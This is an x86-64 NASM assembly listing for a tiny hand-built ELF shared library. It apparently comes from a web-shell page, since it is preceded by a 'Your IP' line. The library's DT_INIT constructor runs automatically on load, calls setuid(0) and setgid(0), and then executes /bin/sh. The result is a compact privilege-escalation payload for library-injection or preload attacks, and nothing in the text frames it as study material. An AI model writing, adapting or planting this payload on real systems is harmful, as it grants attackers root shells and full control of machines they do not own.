Your IP : 3.133.150.11
; nasm -f bin -o tinylib tinylib.asm
BITS 64
org 0
ehdr: ; Elf64_Ehdr
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
times 8 db 0
dw 3 ; e_type
dw 0x3e ; e_machine
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw 0x38 ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf64_Phdr
; LOAD
dd 1 ; p_type
dd 7 ; p_flags RWE
dq 0 ; p_offset
dq 0 ; p_vaddr
dq 0 ; p_paddr
dq filesize ; p_filesz
dq filesize ; p_memsz
dq 0x1000 ; p_align
; DYNAMIC
dd 2
dd 7 ; RWE
dq dynamic
dq dynamic
dq dynamic
dq dynsize
dq dynsize
dq 0x8
dynamic:
; DT_INIT
dq 12
dq _start
; DT_STRTAB
dq 5
dq 0
; DT_SYMTAB
dq 6
dq 0
; DT_STRSZ
dq 0xa
dq 0
; DT_SYMENT
dq 0xb
dq 0
; DT_NULL (ending)
dq 0
dq 0
dynsize equ $ - dynamic
_start:
; setuid(0)
push 105
pop rax
xor edi, edi
syscall
; setgid(0)
push 106
pop rax
;xor edi, edi ; edi is still 0
syscall
; ececve("/bin/sh", 0, 0)
xor esi, esi
mov rax, 0x0068732f6e69622f ; '/bin/sh\0'
push rax
push rsp
pop rdi
push 59
pop rax
cdq
syscall
filesize equ $ - $$